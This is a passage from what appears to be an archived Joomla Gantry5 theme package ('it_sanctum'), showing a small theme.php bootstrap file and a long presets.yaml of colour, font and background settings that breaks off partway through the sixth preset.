    <body>
        <div class="alert">{$message}</div>
    </body>
</html>
html;

    die();
}
PK!�Hit_sanctum/includes/theme.phpnu&1i�<?php
/**
 * @package   Gantry5
 * @author    RocketTheme http://www.rockettheme.com
 * @copyright Copyright (C) 2007 - 2015 RocketTheme, LLC
 * @license   GNU/GPLv2 and later
 *
 * http://www.gnu.org/licenses/gpl-2.0.html
 */

class_exists('\\Gantry\\Framework\\Gantry') or die;

// Define the template.
class GantryTheme extends \Gantry\Framework\Theme {}

// Initialize theme stream.
$gantry['platform']->set(
    'streams.gantry-theme.prefixes',
    ['' => [
        "gantry-themes://{$gantry['theme.name']}/custom",
        "gantry-themes://{$gantry['theme.name']}",
        "gantry-themes://{$gantry['theme.name']}/common"
    ]]
);

// Define Gantry services.
$gantry['theme'] = function ($c)  {
    return new GantryTheme($c['theme.path'], $c['theme.name']);
};
PK!	�N4�4�it_sanctum/gantry/presets.yamlnu&1i�preset1:
  image: 'gantry-admin://images/preset1.png'
  description: 'Preset 1'
  colors:
    - '#c91f37'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#c91f37'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'

preset2:
  image: 'gantry-admin://images/preset2.png'
  description: 'Preset 2'
  colors:
    - '#4f953b'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#4f953b'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'

preset3:
  image: 'gantry-admin://images/preset3.png'
  description: 'Preset 3'
  colors:
    - '#f26d5b'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#f26d5b'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'

preset4:
  image: 'gantry-admin://images/preset4.png'
  description: 'Preset 4'
  colors:
    - '#8283a7'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#8283a7'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'

preset5:
  image: 'gantry-admin://images/preset5.png'
  description: 'Preset 5'
  colors:
    - '#2b90d9'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#2b90d9'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    utility:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    maintop:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    systemmessages:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    sidebar:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbody:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    aside:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    mainbottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    extension:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    additional:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    prebottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    bottom:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    afterbottom:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    last:
      background-color: '#ffffff'
      background-image: 'gantry-media://doves.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    footer:
      background-color: '#282828'
      background-image: 'gantry-media://footer.jpg'
      background-repeat: 'no-repeat'
      background-size: 'cover'
      background-attachment: 'scroll'
      text-color: '#6f6f6f'
      heading-color: '#ffffff'
    copyright:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    offcanvas:
      background: '#ffffff'
      text-color: '#959595'
      toggle-color: '#959595'
      overlay: 'rgba(0, 0, 0, 0.6)'

preset6:
  image: 'gantry-admin://images/preset6.png'
  description: 'Preset 6'
  colors:
    - '#f2aa0f'
    - '#ffffff'
    - '#282828'

  styles:
    base:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
    fonts:
      body-font: 'family=Lato'
      heading-font: 'family=Cormorant+SC'
      menu-font: 'family=Cormorant+SC'
    fontsizes:
      body-font-size: '0.9rem'
      menu-font-size: '1rem'
    accent:
      color-1: '#f2aa0f'
      color-2: '#282828'
    drawer:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    top:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    header:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    navigation:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#959595'
    breadcrumb:
      background-color: '#ffffff'
      background-image: 'gantry-media://bread.png'
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    fullwidth:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    showcase:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    intro:
      background-color: '#f7f7f7'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    feature:
      background-color: '#ffffff'
      background-image: ''
      background-repeat: 'no-repeat'
      background-size: 'auto'
      background-attachment: 'scroll'
      text-color: '#959595'
      heading-color: '#282828'
    subfeature:
      background-color: '#f7f7f7'
      background-image: ''
